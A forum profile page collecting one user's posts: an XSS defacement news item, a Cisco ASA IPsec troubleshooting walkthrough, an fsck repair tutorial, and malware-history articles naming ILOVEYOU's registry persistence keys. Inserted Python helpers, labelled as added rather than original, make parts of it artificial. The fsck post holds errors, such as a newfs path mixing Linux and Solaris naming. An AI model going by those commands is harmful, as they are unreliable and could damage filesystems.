Aerosol

Active Members
Posts: 3453
Days Won: 22

Everything posted by Aerosol

  1. A Singapore-based hacker was sentenced to two months in jail after he hacked into the Singapore prime minister's website and injected unauthorized code. The Straits Times reports that Mohammad Azhar Tahir defaced the site in 2013 with messages and images from the hacktivist group Anonymous, including a Guy Fawkes mask. Tahir ultimately received a sentence of six months after tacking on separate sentences he'd received previously. These other incidents involved stealing a neighbor's wireless service and posting on a TV star's social media channels. Tahir used a cross-site scripting (XSS) attack to alter the prime minister's website. He input HTML code into a Google search bar embedded on the site. Similarly, a Singapore-based doctoral student identified an XSS vulnerability in The Weather Channel's website earlier this month that could have left up to 75 percent of its pages vulnerable. Source
  2. @wikedx it is real; as for finding something of value in every episode, you know the saying "one man's trash is another man's treasure". Storage Wars - Wikipedia, the free encyclopedia is reality television, e.g.: Reality television - Wikipedia, the free encyclopedia
  3. I looked around online and found 2 very interesting video tutorials. #1 #2
  4. IPsec tunnels are only brought up if there is interesting traffic that needs to be encrypted. Unless there is traffic from a source to a destination defined in the crypto policy, the tunnel will not be in the active state. To manually simulate packet flow, we can use the ASA "packet-tracer" tool. It is also good for other traffic-flow simulations and debugging. The syntax is simple:

     packet-tracer input interface_name protocol source_address src_port destination_address dst_port

     Example, simulating traffic from 192.168.1.33 port 8456 to 192.168.2.22 port 80. In Phase 11 and Phase 12 it can be seen that packets from this source to this destination get encrypted and go through the VPN tunnel:

     ASA-A#packet-tracer input inside tcp 192.168.1.33 8456 192.168.2.22 80

     Phase: 1
     Type: ACCESS-LIST
     Subtype:
     Result: ALLOW
     Config:
     Implicit Rule
     Additional Information:
     MAC Access list

     Phase: 2
     Type: FLOW-LOOKUP
     Subtype:
     Result: ALLOW
     Config:
     Additional Information:
     Found no matching flow, creating a new flow

     Phase: 3
     Type: ROUTE-LOOKUP
     Subtype: input
     Result: ALLOW
     Config:
     Additional Information:
     in 0.0.0.0 0.0.0.0 outside

     Phase: 4
     Type: IP-OPTIONS
     Subtype:
     Result: ALLOW
     Config:
     Additional Information:

     Phase: 5
     Type: INSPECT
     Subtype: np-inspect
     Result: ALLOW
     Config:
     Additional Information:

     Phase: 6
     Type: INSPECT
     Subtype: inspect-pptp
     Result: ALLOW
     Config:
     class-map class-default
      match any
     policy-map global-policy
      class class-default
       inspect pptp
     service-policy global-policy global
     Additional Information:

     Phase: 7
     Type: NAT-EXEMPT
     Subtype:
     Result: ALLOW
     Config:
     nat-control
       match ip inside 192.168.1.0 255.255.255.0 outside 192.168.2.0 255.255.255.0
         NAT exempt
         translate_hits = 57843, untranslate_hits = 17148
     Additional Information:

     Phase: 8
     Type: NAT
     Subtype:
     Result: ALLOW
     Config:
     nat (inside) 1 192.168.1.0 255.255.255.0
     nat-control
       match ip inside 192.168.1.0 255.255.255.0 outside any
         dynamic translation to pool 1 (207.139.133.118 [Interface PAT])
         translate_hits = 867276, untranslate_hits = 67836
     Additional Information:

     Phase: 9
     Type: NAT
     Subtype: host-limits
     Result: ALLOW
     Config:
     nat (inside) 1 192.168.1.0 255.255.255.0
     nat-control
       match ip inside 192.168.1.0 255.255.255.0 inside any
         dynamic translation to pool 1 (No matching global)
         translate_hits = 0, untranslate_hits = 0
     Additional Information:

     Phase: 10
     Type: HOST-LIMIT
     Subtype:
     Result: ALLOW
     Config:
     Additional Information:

     Phase: 11
     Type: VPN
     Subtype: encrypt
     Result: ALLOW
     Config:
     Additional Information:

     Phase: 12
     Type: VPN
     Subtype: ipsec-tunnel-flow
     Result: ALLOW
     Config:
     Additional Information:

     Phase: 13
     Type: IP-OPTIONS
     Subtype:
     Result: ALLOW
     Config:
     Additional Information:

     Phase: 14
     Type: FLOW-CREATION
     Subtype:
     Result: ALLOW
     Config:
     Additional Information:
     New flow created with id 1420869, packet dispatched to next module

     Result:
     input-interface: inside
     input-status: up
     input-line-status: up
     output-interface: outside
     output-status: up
     output-line-status: up
     Action: allow

     With the command "show crypto isakmp sa" you can check the state of IPsec VPN tunnels. If the SA is in the "MM_ACTIVE" state, it means the tunnel is successfully established:

     ASA-A#show crypto isakmp sa

        Active SA: 1
         Rekey SA: 0 (A tunnel will report 1 Active and 1 Rekey SA during rekey)
     Total IKE SA: 1

     1   IKE Peer: 20.1.120
         Type    : L2L             Role    : responder
         Rekey   : no              State   : MM_ACTIVE

     Possible ASA isakmp states with a brief description:

     * MM_WAIT_MSG2 - Initial DH public key sent to responder. Awaiting initial contact reply from other side. If stuck here it usually means the other end is not responding. This could be due to no route to the far end, or the far end does not have ISAKMP enabled on the outside, or the far end is down.
     * MM_WAIT_MSG3 - Both peers have agreed on the ISAKMP policies. Awaiting exchange of keyring information. Hang-ups here may be due to mismatched device vendors, a router with a firewall in the way, or even ASA version mismatches.
     * MM_WAIT_MSG4 - In this step the pre-shared key hashes are exchanged. They are not compared or checked, only sent. If one side sends a key and does not receive a key back, this is where the tunnel will fail. It is also possible that the remote side has the wrong peer IP address. Hang-ups here may also be due to mismatched device vendors, a router with a firewall in the way, or even ASA version mismatches.
     * MM_WAIT_MSG5 - This step is where the devices exchange pre-shared keys. If the pre-shared keys do not match it will stay at this MSG. The tunnel may also stop here when NAT Traversal was on when it needed to be turned off.
     * MM_WAIT_MSG6 - This step is where the devices exchange pre-shared keys. If the pre-shared keys do not match it will stay at this MSG. The tunnel may also stop here when NAT Traversal was on when it needed to be turned off. However, if the state goes to MSG6 and then the ISAKMP gets reset, that means phase 1 finished but phase 2 failed. Check that the IPsec settings match in phase 2 to get the tunnel to MM_ACTIVE.
     * AM_ACTIVE / MM_ACTIVE - The ISAKMP negotiations are complete. Phase 1 has successfully completed.

     The "show crypto ipsec sa" command verifies that data is being successfully encrypted and decrypted. The output fields #pkts encrypt: 1989 and #pkts decrypt: 1920 show that we have bidirectional data encryption:

     ASA-A#show crypto ipsec sa
     interface: outside
         Crypto map tag: ASA1VPN, seq num: 10, local addr: 100.100.100.1

           access-list LAN1-to-LAN2 permit ip 192.168.1.0 255.255.255.0 192.168.2.0 255.255.255.0
           local ident (addr/mask/prot/port): (192.168.1.0/255.255.255.0/0/0)
           remote ident (addr/mask/prot/port): (192.168.2.0/255.255.255.0/0/0)
           current_peer: 200.200.200.1

           #pkts encaps: 1989, #pkts encrypt: 1989, #pkts digest: 1989
           #pkts decaps: 1920, #pkts decrypt: 1920, #pkts verify: 1920
           #pkts compressed: 0, #pkts decompressed: 0
           #pkts not compressed: 1989, #pkts comp failed: 0, #pkts decomp failed: 0
           #pre-frag successes: 0, #pre-frag failures: 0, #fragments created: 0
           #PMTUs sent: 0, #PMTUs rcvd: 0, #decapsulated frgs needing reassembly: 0
           #send errors: 0, #recv errors: 0

           local crypto endpt.: 20.1.1.10, remote crypto endpt.: 20.1.1.20

           path mtu 1500, ipsec overhead 58, media mtu 1500
           current outbound spi: 3CFDDAE7

         inbound esp sas:
           spi: 0x0647B7A6 (105363366)
              transform: esp-aes-192 esp-sha-hmac none
              in use settings ={L2L, Tunnel, }
              slot: 0, conn_id: 2, crypto-map: ASA1VPN
              sa timing: remaining key lifetime (kB/sec): (4274994/26580)
              IV size: 8 bytes
              replay detection support: Y
         outbound esp sas:
           spi: 0x3CFDDAE7 (1023269607)
              transform: esp-aes-192 esp-sha-hmac none
              in use settings ={L2L, Tunnel, }
              slot: 0, conn_id: 2, crypto-map: ASA1VPN
              sa timing: remaining key lifetime (kB/sec): (4274956/26568)
              IV size: 8 bytes
              replay detection support: Y

     If you want to enable detailed logging for debugging, you can use the command "debug crypto isakmp number". Number is 1-255. 1 is the default and shows the fewest debugging messages, 255 shows the most:

     ASA-A#debug crypto isakmp 1
     ASA-A#no debug all

     (If you want to disable all debugging messages, simply enter the command "no debug all".) Continue reading on Cisco ASA Packet capturing... Source
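A health check that reads the two outputs the post relies on ("show crypto isakmp sa" and "show crypto ipsec sa") and turns them into a verdict, added here as an example; it is not code from the original post or from Cisco. The sample outputs embedded in it are constructed from the post's listings (a complete peer address, 20.1.1.20, is assumed where the post's listing is truncated), the MM_WAIT_MSGn hints are the post's own table, and the one-way traffic diagnostics are my additions; nothing in it talks to a device.

```python
"""Health check for a Cisco ASA site-to-site IPsec tunnel from CLI output.

Added example, not code from the original post or from Cisco. It parses text
captured from "show crypto isakmp sa" and "show crypto ipsec sa" and applies
the checks the post does by hand: phase 1 must be MM_ACTIVE/AM_ACTIVE and
the phase 2 counters must show traffic in both directions. The two samples
below are constructed from the post's listings; nothing here talks to a device.
"""
import re

# Stuck phase 1 states and the hint the post gives for each one.
ISAKMP_HINTS = {
    "MM_WAIT_MSG2": "peer not responding: no route, ISAKMP not enabled on the peer's outside, or peer down",
    "MM_WAIT_MSG3": "policies agreed, keyring exchange pending: vendor mismatch, firewall in the path, ASA version mismatch",
    "MM_WAIT_MSG4": "pre-shared key hashes sent but none received: wrong peer IP on the remote side, vendor mismatch, firewall in the path",
    "MM_WAIT_MSG5": "pre-shared key mismatch, or NAT Traversal on when it should be off",
    "MM_WAIT_MSG6": "pre-shared key mismatch or NAT Traversal; if ISAKMP resets from here, phase 1 passed and the phase 2 IPsec settings differ",
}
ACTIVE_STATES = {"MM_ACTIVE", "AM_ACTIVE"}

# Constructed sample (peer address 20.1.1.20 assumed; the post's listing is truncated there).
ISAKMP_SAMPLE = """\
   Active SA: 1
    Rekey SA: 0 (A tunnel will report 1 Active and 1 Rekey SA during rekey)
Total IKE SA: 1

1   IKE Peer: 20.1.1.20
    Type    : L2L             Role    : responder
    Rekey   : no              State   : MM_ACTIVE
"""

# Constructed sample, trimmed to the lines the check needs.
IPSEC_SAMPLE = """\
interface: outside
    Crypto map tag: ASA1VPN, seq num: 10, local addr: 100.100.100.1
      current_peer: 200.200.200.1
      #pkts encaps: 1989, #pkts encrypt: 1989, #pkts digest: 1989
      #pkts decaps: 1920 , #pkts decrypt: 1920 , #pkts verify: 1920
      #send errors: 0, #recv errors: 0
"""

_SA_BLOCK = re.compile(r"^\s*\d+\s+IKE Peer:\s*(\S+)(.*?)(?=^\s*\d+\s+IKE Peer:|\Z)", re.S | re.M)
_SA_FIELD = re.compile(r"(Type|Role|Rekey|State)\s*:\s*(\S+)")
_COUNTER = re.compile(r"#(pkts \w+|send errors|recv errors):\s*(\d+)")


def parse_isakmp(text):
    """Return one dict per IKE SA: peer plus the Type/Role/Rekey/State fields."""
    sas = []
    for m in _SA_BLOCK.finditer(text):
        fields = {k.lower(): v for k, v in _SA_FIELD.findall(m.group(2))}
        sas.append({"peer": m.group(1), **fields})
    return sas


def parse_ipsec_counters(text):
    """Return the per-SA packet counters as {name: int}, e.g. {"pkts encrypt": 1989}."""
    return {name: int(value) for name, value in _COUNTER.findall(text)}


def tunnel_verdict(isakmp_text, ipsec_text, expected_peer=None):
    """Return (ok, messages): ok only if phase 1 is active and traffic flows both ways."""
    sas = parse_isakmp(isakmp_text)
    if expected_peer is not None:
        sas = [sa for sa in sas if sa["peer"] == expected_peer]
    if not sas:
        return False, ["no IKE SA present: no interesting traffic yet, wrong peer, or phase 1 never started"]
    sa = sas[0]
    state = sa.get("state", "?")
    if state not in ACTIVE_STATES:
        hint = ISAKMP_HINTS.get(state, "unrecognised state")
        return False, [f"peer {sa['peer']} stuck in {state}: {hint}"]
    messages = [f"peer {sa['peer']} phase 1 {state} ({sa.get('type')}, {sa.get('role')})"]

    counters = parse_ipsec_counters(ipsec_text)
    enc, dec = counters.get("pkts encrypt", 0), counters.get("pkts decrypt", 0)
    if enc and dec:
        ok, note = True, f"phase 2 passing traffic both ways: {enc} encrypted, {dec} decrypted"
    elif enc:
        ok, note = False, "one-way: encrypting but nothing decrypted; check the remote side's crypto ACL, routing and NAT exemption"
    elif dec:
        ok, note = False, "one-way: decrypting but nothing encrypted; the local crypto ACL or NAT exemption probably misses the flow"
    else:
        ok, note = False, "phase 1 up but no packets either way: no interesting traffic matched the crypto map"
    messages.append(note)
    if counters.get("send errors") or counters.get("recv errors"):
        messages.append(f"errors: send={counters.get('send errors', 0)} recv={counters.get('recv errors', 0)}")
    return ok, messages


if __name__ == "__main__":
    ok, msgs = tunnel_verdict(ISAKMP_SAMPLE, IPSEC_SAMPLE, expected_peer="20.1.1.20")
    print("OK" if ok else "PROBLEM")
    for msg in msgs:
        print(" -", msg)
```

Feed it text captured from the device (a terminal log or an SSH session) in place of the constructed samples. A tunnel counts as healthy only when phase 1 is MM_ACTIVE/AM_ACTIVE and both #pkts encrypt and #pkts decrypt are non-zero, which is exactly the pair of checks the post walks through by hand; a stuck MM_WAIT_MSGn state comes back with the post's hint for that state.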
  5. Fsck utility

     A filesystem on Linux, or on any other OS, can get corrupted in some situations. This can happen for reasons like an abnormal shutdown, hardware malfunction, switching off the system without the proper shutdown procedure, or a power failure. Because of these, the superblock in a file system is not correctly updated and holds mismatched information about the system data blocks, free blocks and inodes. A corrupted Linux filesystem can be repaired with the program called "fsck". The system utility fsck ("file system check" or "file system consistency check") is a tool for checking the consistency of a file system on Linux and Unix-like operating systems.

     (Important: before any action is taken, file systems must be unmounted. It is not possible to repair a filesystem while it is in use, because it changes constantly and fsck may see those changes as inconsistencies and corrupt the file system even more. Fsck should always be run in single-user mode. Running fsck on a mounted filesystem could do SEVERE damage.)

     FSCK options overview:
     -f switch - force the file system check regardless of its clean flag
     -p switch - fixes minor problems without user interaction (safe repair during the boot process)
     -y switch - gives permission to correct every problem found without user interaction
     -n switch - only searches for (and does not correct) problems
     -b=n - n is the number of the next superblock, if the primary superblock of a filesystem is corrupted

     fsck checks the filesystem in 5 phases:
     phase 1 - Check Blocks and Sizes
     phase 2 - Check Pathnames
     phase 3 - Check Connectivity
     phase 4 - Check Reference Counts
     phase 5 - Check Cylinder Groups

     The simplest way to run fsck is to force an fsck on restart, and then restart your system:
     LinuxBox# touch /forcefsck
     or
     LinuxBox# shutdown -rF now

     The command to check a corrupted and unmounted filesystem would simply be fsck /dev/xxx, where /dev/xxx is the corrupted partition or filesystem:
     LinuxBox# fsck /dev/sda1

     Another option is to switch the system to runlevel 1, log out any users, unmount all partitions and run fsck. After the repair, remount all drives and go back to runlevel 3:

     1) Take the system down to runlevel one (single-user mode):
     LinuxBox# init 1
     (all commands should be run as the root user)

     2) Unmount the file system; for example, if it is the /dev/sda3 file system, type the command:
     LinuxBox# umount /dev/sda3

     3) Run fsck on the partition:
     LinuxBox# fsck -t ext3 /dev/sda3
     (Specify the file system type using the -t option. By default, fsck assumes an ext2 file system. Notice: if you don't specify the correct filesystem, the result could be even more corruption.) If you don't know which filesystem type to specify, you can use the mount command, which will display the type. To check and repair the file system without fsck asking any questions, use the -y option:
     LinuxBox# fsck -t ext3 -y /dev/sda3
     (If any files are recovered, they are placed in the /home/lost+found directory by the fsck command.)

     4) Once fsck finishes, the file system can be remounted:
     LinuxBox# mount /dev/sda3

     5) Switch to multi-user mode again:
     LinuxBox# init 3

     Here are also some of the fsck error messages and solutions:

     1. Corrupted superblock - fsck fails to run
     If the superblock is corrupted, the file system can still be repaired using an alternate superblock, which is created while making a new file system:
     LinuxBox# newfs -N /dev/sda1/c0t0d0s3
     The first alternate superblock number is 32, and the other superblock numbers can be found. To run fsck using the first alternate superblock, the following command can be used:
     LinuxBox# fsck -F ufs -o b=32 /dev/rdsk/c0t0d0s3

     2. Link counter adjustment
     fsck can find a mismatch between directory inode link counts and actual directory links, and prompts for adjustment. Link count adjustments are considered a safe operation in a file system and should be repaired by giving a 'y' response to the "adjust?" prompt during fsck.

     3. Free block count salvage
     During fsck, the number of free blocks listed in a superblock and the actual count of unallocated free blocks do not match. fsck reports this mismatch and asks to salvage the free block count to synchronize the superblock count. This error can be corrected without any potential problem to the file system or files.

     4. Unreferenced file reconnection
     While checking connectivity, fsck can find some inodes which are allocated but not referenced, i.e. not attached to any directory. Answering y to the reconnect message from fsck links these files into the lost+found directory with their inode number as their name. To get more info about the files in lost+found, the 'file' command can be used to see the type of the files, and subsequently they can be opened in their applications or text editors to find out about their contents. If a file is found to be correct, it can be used after copying it to some other directory and renaming it. Source
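The post's safety rule (never fsck a mounted filesystem, and pass the right -t) is the kind of thing worth enforcing in a wrapper rather than remembering. The following is an added example, not code from the original post: it parses /proc/mounts (including the \040 octal escape that file uses for spaces in mount points), refuses to build an fsck command for a device that is mounted, and defaults to a report-only fsck -n pass before any -y repair. The /proc/mounts snapshot inside it is constructed; detect_fstype shells out to blkid, which is assumed to be installed and is only used when you run it against a real device.

```python
"""Guard around fsck: refuse a mounted device, pick -t explicitly, dry-run first.

Added example, not code from the original post. It reads /proc/mounts text
(the snapshot below is constructed), refuses to build an fsck command for a
device that is mounted, and defaults to a report-only "fsck -n" pass before
any "-y" repair. detect_fstype shells out to blkid and is only needed when
you point this at a real, unmounted device as root.
"""
import re
import shlex
import subprocess

# Constructed /proc/mounts snapshot (not from the post). Note the \040 octal
# escape: /proc/mounts encodes a space in a mount point that way, so a split
# on whitespace still works but the path must be unescaped afterwards.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda3 /mnt/my\\040data ext3 rw,relatime 0 0
tmpfs /run tmpfs rw,nosuid,nodev,mode=755 0 0
"""

_OCTAL = re.compile(r"\\([0-7]{3})")


def _unescape(field):
    """Decode the \\ooo octal escapes used in /proc/mounts fields."""
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), field)


def parse_mounts(text):
    """Return {device: (mountpoint, fstype, options)} from /proc/mounts text."""
    mounts = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed or blank line
        dev, mnt, fstype, opts = (_unescape(p) for p in parts[:4])
        mounts[dev] = (mnt, fstype, opts)
    return mounts


def mounted_as(device, mounts_text):
    """(mountpoint, fstype, options) if device is mounted, else None."""
    return parse_mounts(mounts_text).get(device)


def safe_to_fsck(device, mounts_text):
    """True only when the device does not appear in /proc/mounts."""
    return mounted_as(device, mounts_text) is None


def fsck_command(device, fstype, mounts_text, repair=False):
    """Build the fsck argv for an unmounted device; raise if it is mounted.

    repair=False gives "fsck -t <type> -n" (report only); repair=True gives
    the post's "-y" form, which answers yes to every fix.
    """
    entry = mounted_as(device, mounts_text)
    if entry is not None:
        raise RuntimeError(f"{device} is mounted on {entry[0]} ({entry[1]}); unmount it first")
    return ["fsck", "-t", fstype, "-y" if repair else "-n", device]


def detect_fstype(device):
    """Ask blkid for the filesystem type instead of trusting fsck's ext2 default."""
    out = subprocess.run(["blkid", "-o", "value", "-s", "TYPE", device],
                         capture_output=True, text=True, check=True).stdout
    return out.strip()


if __name__ == "__main__":
    # Demo against the snapshot; on a real box use open("/proc/mounts").read().
    for dev in ("/dev/sda3", "/dev/sdb1"):
        try:
            print(shlex.join(fsck_command(dev, "ext3", SAMPLE_MOUNTS)))
        except RuntimeError as err:
            print("refused:", err)
```

On a real system you would pass open("/proc/mounts").read() and detect_fstype(device) instead of the snapshot and the hard-coded "ext3"; the point of the -n default is that the first pass only reports, so you see what fsck intends to change before handing it -y.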
  6. I remember the eager anticipation that led to the turn of the century. All throughout 1999, all I ever saw or heard in the media was millennium this, millennium that. Sure, the Gregorian calendar is a completely human invention. But it has a strong social impact on our lives. Many people in Western history never experienced a century turn. Most would never experience a millennium turn, because it only happens once every thousand years. Depending on the era, people rarely lived beyond age 50, 60 or 80. But as the turn of the millennium was a human invention, it affected other human inventions. By the end of the 20th century, computing had already entered our lives in a wide variety of facets. In fact, we were already dependent on it. (Yes, I know the 21st century started on January 1st, 2001. But the turn of the millennium definitely happened as December 31st, 1999 became January 1st, 2000.)

     All computers run by clocks. One manages the data bus and the CPU, and the other runs the system time as maintained by firmware. The firmware in most PCs and servers records dates according to the Gregorian calendar. But as basic computing processes can calculate numbers faster than character strings that need to be converted into numbers, the dates in system time are in a numerical format: 12/31/99 or 31/12/99, for example. The standards developed by major OEMs in the 20th century, such as IBM, kept to a nice and balanced two digits, two digits, two digits. Either the new millennium didn't occur to these technology developers, or they figured their systems would be replaced before the year 2000. Either way, our banking, governmental and institutional computing systems were going to think it was the year 1900 in the year 2000. The news media worldwide leapt at this particular bug report, frequently misunderstanding it. So, ordinary people thought they were going to lose the money in their bank accounts, the electricity would shut down, and all hell would break loose. Some people even stocked up on canned goods and other emergency supplies, awaiting the speculated disaster. Well, throughout 1999, the media buzz likely spurred the tech industry to double their efforts. So much patching and other systematic repair was done that as January 1st, 2000 rolled in, few people noticed any problems at all. What an ordinary person with a home PC or an office job should actually have been worried about was ILOVEYOU.

     In this fourth article in my series, malware events greatly multiply in frequency. So in my research, I've had to carefully consider which malware to write about. The ones I've chosen are the ones I've deemed to be the biggest "game changers." The malware that affected the greatest numbers of people, and the malware that set trends in malware development, are the few I've selected to cover.

     ILOVEYOU

     It's human nature to want love, affection, and validation. Most trojan developers understand that need, and often choose to exploit it. For instance, if you don't surf the web with an ad blocker or use a strong spam filter with your email, how many times have you heard that hot Russian women want to meet you right now? I'm a Canadian woman, and they can't even resist me. Sure, that sort of spam probably targets sexuality, but a need for love is a factor too. Reomel Lamores of the Philippines understood that aspect of human nature very well. In May 2000, he was a computer programmer who worked for China Bank. He liked to play around with Visual Basic. Some people speculate that Lamores wanted to wreak havoc. Lamores himself claims that he was just experimenting with his programming and that he didn't intend for his code to escape. But if he didn't want his code to escape, why did he make a trojan? Trojan malware works by fooling users with social engineering. Unlike malware that isn't a trojan, it can't spread without the intervention of end users. Like many trojans, ILOVEYOU primarily spread via email. The subject headings of the emails contained a string roughly like "ILOVEYOU," hence its name. The body said, "kindly check the attached LOVELETTER coming from me." So, I suppose the idea was that end users were intended to be fooled into thinking they had some sort of secret admirer. Most end users, particularly back in the year 2000, didn't know to be suspicious of attachments with two file extensions, especially if one of the extensions is an executable. Lamores didn't even bother to hide the Visual Basic extension, so the name of the attachment was LOVE-LETTER-FOR-YOU.TXT.vbs. Why would he go to that effort to deceive if he didn't intend for his code to escape? I don't believe the claims he made after he was caught, so he's not as effective a liar as he thought he was.

     As it was a Visual Basic script, it targeted Microsoft Outlook and Windows. Back in 2000, no other operating system platform or email client was anywhere near as prevalent. The script made changes in two of the most crucial registry keys:

     HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
     HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

     ILOVEYOU would then create a malicious Internet Explorer shortcut on the desktop, send a webpage to many other people via IRC, and change a large number of scripting and media files to malicious VBS files that would keep propagating the worm to various email and IRC contacts. And so on, and so forth. The Register estimated that many millions of people worldwide were affected, and possibly hundreds of millions of dollars were lost. Hopefully, the ILOVEYOU incident was an indication to the Philippines' government that their criminal code needed to be updated for the 21st century, because at the time there was no crime Lamores could be charged with under Filipino law.

     Slam Dunk

     In July 2002, IT security scientist David Litchfield discovered a vulnerability in Microsoft SQL Server and Microsoft SQL Server Desktop Engine. Considering how Microsoft's IIS webserver dominated the market, especially then, the potential for destruction was immense. It was a buffer overflow vulnerability. Software developers understand intimately how that sort of memory management problem can cause machines and systems to crash and disable like crazy. Fortunately, once Microsoft became aware of the bug, they quickly patched it. Unfortunately, it seems that countless institutions and corporations weren't patch managing their IIS servers properly. Oops! On January 25th, 2003, disaster struck, and its name was SQL Slammer. The name was based on the programs it targeted, as it wasn't written in SQL. When servers caught SQL Slammer, no other worm in history, not even ILOVEYOU, had ever spread so quickly. Once a Microsoft-based machine caught an infection, 376 bytes would be sent to UDP port 1434. Then, enough packets would be sent to that port to cause a DoS (denial of service) attack, causing the server to crash. The payload would be sent to other connected webservers, causing huge numbers to crash, all in a matter of a couple of days. Millions of people found that many of their favorite websites and web services didn't work properly, or would be unavailable altogether. If anything can be learned from the incident, it's the principle of patching. Patch your servers and clients daily if possible! That sort of measure likely would've prevented SQL Slammer's immense destruction.

     "I don't have to worry about viruses, I've got a Mac!"

     I still hear this myth from the mouths of end users today, especially Apple fanboys and fangirls. "I don't have to worry about viruses, I've got a Mac!" Once this series of mine entered the 1990s, Microsoft Windows became well established as the computing platform of choice for the overwhelming majority of end users and businesses worldwide. That market dominance, coupled with no file-level permissions in client Windows until Windows XP's release in 2001, led to an environment where the vast majority of malware targets were Microsoft products. So, it's still popularly believed that malware is a problem exclusive to Windows. By 2003, Apple's new BSD/Unix-based platform, Mac OS X, was already rather popular with many users, particularly those who work in digital media. Mac OS X is definitely more secure because it's based on that tried and tested Unix code. And in the early 2000s, OS X had less than 5% of microcomputer marketshare. So, an operating system that was more difficult to exploit, coupled with only having a minority install base, made it seem like the platform was invulnerable. If you're a malware developer, which platform would you target? One based on the inherently less secure MS-DOS and NT kernels, on over 90% of PCs? Or the one based on the considerably more secure BSD/Unix kernel, with a minority of installs? The answer should be obvious. But my fiancé Sean Rooney wanted to prove to doubters that Mac OS X malware was indeed possible, so he created a proof-of-concept back in 2003 that knocked people's socks off. Sure enough, it wasn't too long after that the probable first Mac OS X malware was found. Its name was Renepo, discovered in 2004. Unlike the other malware featured in this article, Renepo wasn't designed to spread via the Internet. Instead, it spread via removable media, so it affected fewer machines. So, Renepo should be a reminder to those of us in the IT security community that malware can still spread by infected disks, and can indeed affect Apple products. Renepo was a shell script that could disable firewalls, crack passwords, and disable updates. It was truly nasty stuff, indeed.

     Amphimix

     Renepo was a precursor of things soon to come. The next major Mac OS X malware hit the scene mere months afterwards. By 2004 and 2005, the iPod was already a moneymaker for Apple of the likes they had never had before. Initially released in 2001, a few years later the music player line was still a must-have toy, and it caused mp3 files to become immensely popular. Apple's iPod, and iPhones and iPads today, require iTunes to be installed on the PCs they're mounted to, in order for Apple's DRM to work properly. (Unless you know how to crack it, of course.) It was a good marketing decision to develop iTunes for Windows, in addition to OS X. Months after Renepo, Amphimix was discovered. It was a file-bound mp3 that spread via P2P, email, IRC, the web, and FTP. When played in iTunes on either platform, wild laughter could be heard. And if the iTunes install was on OS X, Amphimix could cause major trouble. Like Renepo, firewalls and AV shields were disabled. Unlike Renepo, the DNS records on infected Macs were altered. When users used DNS to surf the web, they'd be redirected to malicious IP addresses. Amphimix was a major troublemaker for Macs in 2004 and 2005.

     The next article in my series is the final one. I'll cover important malware events from 2006 up until the present day in 2014. My teachers in school taught me that in order to prevent problems in the future, we must understand problems from the past. Hence, it's vital to study history! I look forward to getting you caught up on the history of malware up to now, so we can prevent the serious destruction of computing systems in the future. Malware is a bigger issue than ever, and I figure it'll only get worse as time goes on.

     References
     * No 'sorry' from Love Bug author - The Register
     * The Love Bug: A Retrospect - Rixstep Industry Watch
     * W32.SQLExp.Worm - Symantec
     * Inside the Slammer Worm - IEEE Security and Privacy Magazine, http://cseweb.ucsd.edu/~savage/papers/IEEESP03.pdf
     * 10 years of Mac OS X malware - We Live Security
     * Detailed Analysis: Renepo-A - Sophos, http://sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/SH~Renepo-A/detailed-analysis.asp
     * Straight facts about Mac Malware - ESET, http://eset.com/int/mac-malware-facts/
     * Amphimix-A - Panda Security
     * Detailed Analysis: Mac/Amphimix-A - Sophos
     Source
  7. In my previous article, I explained what happened to the evolution of malware when microcomputers started to become a major presence in small offices and households. That coincided with the exploding popularity of Microsoft’s MS-DOS and Windows 3.1. The file systems they were based on, FAT16 and later on, FAT32, totally lacked file and folder level privileges, so it was easy for targeted malware to cause huge problems. During the period covered in the last article, commerical ISPs made their debut. So people outside of academic settings started using email, USENET, and other Internet services. By 1991, Sir Tim Berners-Lee invented the web. In early 1993, I was on the web for the first time, and my very first web browser was the brand new Mosaic. In response to how Mosaic made the web accessable for many people, Netscape entered the scene. I was one of the lucky few to beta test Navigator 1.0 in November 1994. What was really cool was that I could see content and text loading in my webpages before they were completely downloaded. As we had a 16 kbps modem, I really appreciated that. Netscape, and soon after, Internet Explorer, brought the web into millions of homes for the very first time. That made the Internet a lot more popular. To this very day, I encounter end users who think the Internet and the web are one and the same. Argh! So, there opened a huge new vector for malware, and the Internet overcame floppy disks as the leading cause of malware distribution. And now, the history of malware is starting to get very interesting… Don’t Call My Name, Leandro The Michelangelo virus, as mentioned in my previous article, was the first “time bomb” virus to become notably widespread. It seemed like that from then on, “time bombs” started to become very popular. The antivirus community initially encountered the Leandro virus in 1993. As it was a “time bomb,” it was set to go off on a particular date. 
In Leandro’s case, that date was October 21st of the year of infection. Based on my research, if a PC got infected after October 21st of a calendar year, it likely would go off on that date in the following calendar year. But like many of the earlier viruses to create a big splash, it was kind enough to print a message for the user. This was Leandro’s message: Leandro and Kelly ! GV-MG-Brazil You have this virus since XX-XX-XXXX The date of infection, whichever date that was, as it would vary in each incidence, would be in it. Leandro was often spread via shareware on floppies, but as Internet usage started to grow rapidly, it was found to spread via BBS as well. I remember downloading quite a bit of shareware through BBS, so that was likely a primary vector. It was especially nasty, because it targetted the MBR of floppy disks and HDDs. So, although it could enter a system via Windows and MS-DOS vulnerabilities, it could then impact completely unrelated operating systems as well, such as the very first GNU/Linux distros. Leandro kept infecting machines for at least a few more years, into the late 1990s. Few Windows users ran antivirus software those days, or even knew what antivirus software was. So I imagine that after Leandro made an operating system unusable on a particular year’s October 21st, an awful lot of HDDs were thrown out. It’s difficult to determine how many disks were infected, as most people didn’t report their infections to antivirus vendors. Maybe it caused more disks to enter landfills than cartridges of E.T. for Atari, but we’ll never know for sure. Freddy Around the same time, Freddy was discovered. Like Leandro, it appeared to come from Brazil. Like the other viruses mentioned in this article and the previous one, it targeted Windows. .COM and .EXE executables were affected, especially COMMAND.COM. Remember how crucial that file was? 
